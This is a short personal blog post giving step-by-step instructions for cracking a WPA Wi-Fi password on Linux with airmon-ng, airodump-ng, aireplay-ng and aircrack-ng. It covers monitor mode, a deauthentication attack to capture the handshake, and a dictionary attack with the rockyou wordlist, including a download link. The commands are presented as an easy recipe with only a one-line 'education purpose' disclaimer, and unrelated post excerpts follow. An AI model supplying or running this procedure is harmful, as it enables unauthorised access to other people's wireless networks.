Skip to main content

how to get the wifi password in linux

this a easy one . So iam not gonna describe  the whole thing jsut follow the steps thats all.
Lets gets to it :)


first you need some free tools . if you are using a kali linux distro you already have it in case you dont follow this commands one by one



  • sudo apt-get install airmon-ng 
  • sudo apt-get install airodump-ng
  • sudo apt-get install aireplay-ng
  • sudo apt-get install aircrack-ng 
downlod this wordlist


http://scrapmaker.com/download/data/wordlists/dictionaries/rockyou.txt


and after this these we pretty much get everything we need


next step type in

ifconfig


it will show the available device pick one in mind it will looks like wlan1 wlan0 something like that 


and iam gonna pick wlan0

next type in
airmon-ng wlan0 start 
thats will start our wlan0 as monitor mode
and show some process kill them all with
kill pid

then type in
airodump-ng wlan0mon
 this will show all the available network pick the network and copy the essid,channel and bssid to a clipboard you will need it

now open a new tab type in(fill in bssid essid and channel your self from the clipboard)
 airodump-ng -c channel -w /root/essid --bssid bssid wlan1mon
 open a new tab type in (fill in the bssid)
aireplay-ng -0 -0 -a bssid wlan1mon
 wait for a sometime and then you will notice wpa handshake in our airodump tab.

to the last step 
copy both the .cap file from this /root/essid place anf the rockyou.txt to a common folder
open a new tab and ove to the common folder useing the cd command
then type in
aircrack-ng -w rockyou.txt *.cap

this will take some time .



for not the rockyou.txt have a large collection for words and aircrack compare it with the .cap file and eventually find a match


and for my defense this blog is for education purpose only and you guys should have fun while staying inside the law   

 

Comments

Popular posts from this blog

Data Type vs Return Type

Legend Of The Returned One Aha that is a question right ? Aren't they are the same thing ? At some point I honestly thought the same but actually it's not data type is not return type and return type is not data type . E ven if you are using Java php c++ or any other languages During a program we have to initialize or declare some variable for that we need to specify what data are we gonna use on that particular variable location . Then what is return type ? We seen that when we a create  or providing the definition to a function we have to specify a return type to indicate what data type is return from the function to the main function to be more specific it's know as return data type. For example void cat ( ) " the function cat is not returning any data " or int cat( ) " means cat is returning some value to the main function" Ever seen any variable as a data type of return? I haven't and please let me know

Build Your On Virtual Assistant with AIML And Python

i know its been a while last i post something here.... i have your back , i got something way more interesting ...you read the title :D The things we are gonna need for this ride linux based system AIML PYTHON XML in short AIML is a form of XML that defines rules for matching patterns and determining responses. so every response should be written here.... dont worry i found a bunch of them on internet and i will provide And since we are gonna work with python we need aiml in python so enter this on terminal pip install aiml lets go to the code then   starting with XML <aiml version = "1.0.1" encoding = "UTF-8" >        <category>                <pattern> LOAD AIML B </pattern>         <template>             <learn> *.aiml </learn>         </template>             </category> </aiml>     save its as k.xml note:- see i put <learn> *.aiml </le

Making money on-line ? try bit-coin mining

Explaining cryptocurrency mining like Bitcoin you have a system useing it every 24/7 . and you wanna make some money out of it with out those terrible methods you found on the web . i have a better one . if you dont wanna type share prompt thing like  this the blog. Give it   CRYPTOMINING. you are mining for bit coin or lite coin this are digital currency that have real life value . such as a single bit coin worth 2554 us dollar at the time of this blog.you can easily use this to buy games on steam or other translations . but some country's(Japan)consider this as a illegal. so down to the real question how do you get this coins with out stretching your back .it is not that hard .you need a good system with a respectable GPU , a wallet , a mining program. for a wallet shoot-out to coin base i leave a link below (not hard and newbi friendly )     for mining program there a lot and i have one so you can try out . its call nice hash.likes are down there  all you have t